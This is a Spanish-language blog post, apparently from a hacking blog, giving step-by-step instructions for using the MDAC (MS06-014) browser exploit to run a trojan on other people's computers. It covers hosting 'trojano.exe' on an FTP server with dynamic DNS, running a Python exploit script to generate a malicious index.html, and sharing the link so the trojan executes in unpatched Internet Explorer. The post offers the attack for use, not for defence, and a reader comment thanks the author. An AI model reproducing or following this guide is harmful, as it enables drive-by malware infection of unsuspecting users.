Guia para ejecutar un archivo en una Pc remota usando el exploit Mdac(ms06-14)...
En principio debemos descargar las siguientes herramientas:
1.Cualquier programa de FTP SERVER, como por ejemplo Serv-U (lo puedes descargar de www.serv-u.com)
2.Python 2.4.3 (Download)
3.El registro en cualquier DNS dinamico (www.dyndns.com)
4.Finalmente descargamos el exploit de AQUI
A.-Configuramos el setup del server (Ej:ftp://xxxxxx.ath.cx/).Si utlizas IP dinamica, asegurarse que en el registro en www.dyndns.com, conseguimos un nombre de host igual...Luego subimos nuestro archivo ejecutable al directorio raiz (Ej:ftp: // xxxxxx.ath.cx/trojano.exe).
B.-Instalamos python 2.4.3 ( Ej:C:\python24\ )
C.-Guardamos el exploit que descargamos en el directorio de python(Ej:C:\python24\exploit.py )
D.- Click en Inicio >> Ejecutar >> y escribimos "c:\python24\python exploit.py ftp://xxxxxx.ath.cx/trojano.exe index.html"
E.-Copiamos index.html al directorio raiz del ftp(Eg. ftp: // xxxxxx.ath.cx/index.html).Lo más importante es que el archivo ejecutable (Eg. Trojano.exe) y el archivo "index.html" deben estar en el mismo dominio (Eg. ftp: // xxxxxx.ath.cx/)
F.-Ahora tenemos creado el siguiente enlace (Eg. ftp: //xxxxxx.ath.cx/index.html), y el archivo será ejecutado sobre la Pc remota, si alguien tiene acceso al link usando Internet Explorer sin parchar...
1 Comments:
Saludos MouseHack .. buen tip gracias he xD
Publicar un comentario
<< Home